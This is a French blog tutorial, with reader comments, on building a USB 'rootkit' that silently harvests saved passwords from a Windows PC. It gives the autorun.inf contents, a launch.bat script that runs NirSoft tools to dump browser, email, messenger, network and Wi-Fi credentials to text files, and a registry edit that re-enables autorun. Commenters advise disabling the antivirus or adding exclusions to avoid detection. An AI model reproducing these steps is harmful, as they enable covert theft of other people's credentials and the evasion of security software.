Sous ce titre accrocheur, nous allons voir qu’avec un peut de bon sens, nous allons réaliser un script qui permet de scanner et déchiffrer les mots de passe de votre PC à l’aide d’une clé USB. Bon je sais ce n’est pas conficker, mais bon.
Dans un premier temps, nous allons récupérer plusieurs logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issu du site Nirsoft (ici)
- MessenPass: récupère les mots de passe de messagerie instantanée le plus populaire des programmes: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger avec Netscape 7, Trillian, Miranda, GAIM et.
- Mail PassView: récupère les mots de passe des programmes de messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP et SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
- IE Passview: IE PassView est un petit utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Compatible avec le nouveau Internet Explorer 7.0, ainsi que les anciennes versions d’Internet Explorer v4.0 – v6.0
- Protected Storage PassView: Récupère tous les mots de passe stockés dans le Protected Storage, y compris la saisie semi-automatique des mots de passe d’Internet Explorer, les mots de passe des sites protégés par mot de passe, mot de passe de MSN Explorer, et plus …
- PasswordFox: PasswordFox est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Mozilla Firefox. Par défaut, PasswordFox affiche les mots de passe stockés dans votre profil actuel, mais vous pouvez facilement choisir de regarder les mots de passe de tout autre profil Firefox. Pour chaque mot de passe d’entrée, l’information suivante est affichée: Record Index, site web, nom d’utilisateur, mot de passe.
- Network Password Recovery : Lorsque vous vous connectez à un partage réseau sur votre réseau local ou sur votre compte. NET Passport, Windows vous permet d’enregistrer votre mot de passe afin de l’utiliser à chaque fois que vous connectez sur le serveur distant. Cet utilitaire récupère tous les mots de passe réseau stockés sur votre système pour l’utilisateur connecté.
- ChromePass : ChromePass est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le nom d’utilisateur, mot de passe et l’heure de création.
- WirelessKeyView : WirelessKeyView récupère toutes les clés de réseau sans fil / mots de passe (WEP / WPA) stockés dans votre ordinateur par le service ‘Wireless Zero Configuration’ de Windows XP et par le service ‘WLAN AutoConfig’ de Windows Vista.
Créer un dossier RootKit sur votre bureau et téléchargez toutes les applications ci-dessus dedans.
Ensuite décompresser toutes les archives et gardez que les exécutable (.exe)
Copiez tous les fichiers .exe du répertoire à la racine de votre clé USB.
Ouvrer le bloc-note de windows et copier le texte suivant
[autorun]
open = launch.bat
ACTION = Scan Passwords
Puis enregistrez le fichier sous la racine de la clé sous le nom autorun.inf
Ouvrer un autre bloc-note et copier le texte suivant :
start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start mspass.exe /stext mspass.txt
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start pspv.exe /stext pspv.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
Ensuite enregistrer votre document à la racine de votre clé, sous le nom de launch.bat
Votre rootkit est maintenant prêt. Nous allons le tester.
Sur certain ordinateur, comme le mien par exemple j’ai désactivé l’autorun, pour ce tutoriel je vais le réactiver. Ce rootkit fonctionne quand même il suffit juste dans le poste de travail de cliquer sur le fichier launch.bat pour lancer le rootkit, si l’autorun est désactivé.
Pour activer l’autorun pour tous les lecteurs, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)
Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] et modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091
Redémarrer le PC. Ensuite insérer votre clé USB, un menu s’affiche et sélectionner Scan Password, la première option.
Maintenant, tous les outils de récupération de mot de passe seront exécutés silencieusement en arrière-plan (ce processus ne prend que quelques secondes). Les mots de passe sont stockés dans les fichiers .TXT.
Vous n’avez plus qu’a les ouvrir et voir les mots de passe déchiffrer. Je vous conseil de visiter régulièrement le site de NirSoft car des mises à jour ainsi que des nouveaux logiciels sortent souvent.
That’s All.
Difficulté : 
Modification : -
Crédits : -
![#101 [Astuce] Téléchargements illimités sur MegaUpload.](http://quick-tutoriel.com/wp-content/uploads/672x476_157.jpg)
Bonjour,
Depuis les nouveaux tutoriels j’ai abandonné de marquer la difficulté.
A bientôt.
Bonjour, impossible de renommer le fichier txt en .bat, il disparait, que ce soit avec seven ou xp, donc la clé ne peut marcher puisque n’apparait pas « lancer scan ».
oublié quelque chose.? ?
cordialement
salut! Conment on peut faire pour eviter la detection par l’antivirus
Merci
simple tu ajoute une exclusion dans l’antivirus, du chemin ou ce trouve les exe nirsoft. enfin si tu a la main sur l’antivirus bien sur !
Bonjour, d’abord merci pour ce tuto. ça marche très bien. j’ai juste un problème avec l’autorun. J’ai testé la clé sur xp, 7 et vista et quand je met la clé dans le port on me demande ce que je veux faire comme d’habitude. mais il n’y a pas le scan passwords. comment faire?
jai un problème quand je veux enregistrer le fichier launch.bat mon antivirus détecte un cheval de trois !!
que faire
t’inquiète pas c’est normal il faut que tu désactive ton antivirus lorsque tu le fait